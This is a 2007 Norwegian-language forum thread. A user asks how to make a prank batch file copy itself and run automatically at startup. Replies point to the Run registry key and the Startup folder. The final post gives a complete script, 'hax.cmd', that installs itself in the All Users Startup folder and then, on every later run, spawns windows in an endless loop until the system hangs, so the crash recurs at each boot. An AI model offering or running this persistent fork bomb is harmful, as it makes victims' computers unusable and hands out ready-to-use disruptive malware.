pumazz Skrevet 2. desember 2007 Del Skrevet 2. desember 2007 (endret) jeg har laga et tulle program i .bat. Så lurer jeg på hva jeg må skrive for å få bat filen til å kopiere seg selv når man kjører det, og autokjøre seg selv når men skrur på data'n Endret 2. desember 2007 av pumazz Lenke til kommentar
arex1337 Skrevet 2. desember 2007 Del Skrevet 2. desember 2007 Angående "autokjøre", putt navnpåfiladi.bat inn i C:\autoexec.bat Lenke til kommentar
GeirGrusom Skrevet 2. desember 2007 Del Skrevet 2. desember 2007 Autoexec blir ikke brukt av Windows NT (Windows XP, Windows Vista) Angående kjøre, så kan du legge den i HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run eller i Startup (Oppstart) i startmenyen (%HOMEPATH%\Start Menu\Startup) eller velge den som startup script for brukeren din i brukeroppsettet på maskinen. Lenke til kommentar
arex1337 Skrevet 2. desember 2007 Del Skrevet 2. desember 2007 Faktisk så blir den brukt. Men den ignorerer alt annet enn setting av miljøvariabler. Lenke til kommentar
GeirGrusom Skrevet 2. desember 2007 Del Skrevet 2. desember 2007 Angående "autokjøre", putt navnpåfiladi.bat inn i C:\autoexec.bat Men da vil jo ikke dette fungere allikevel Lenke til kommentar
Spartakus Skrevet 2. desember 2007 Del Skrevet 2. desember 2007 (endret) hax.cmd: @echo off IF NOT EXIST "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\hax.cmd" ( copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" )ELSE (GOTO :CRASH) :END EXIT :CRASH start GOTO CRASH Ved første gangs kjøring legger den seg i startup-mappa. Ved andre gangs kjøring starter den nye vinduer av seg selv helt til systemet henger seg og du må restarte og slik fortsetter det... Endret 2. desember 2007 av Spartakus Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå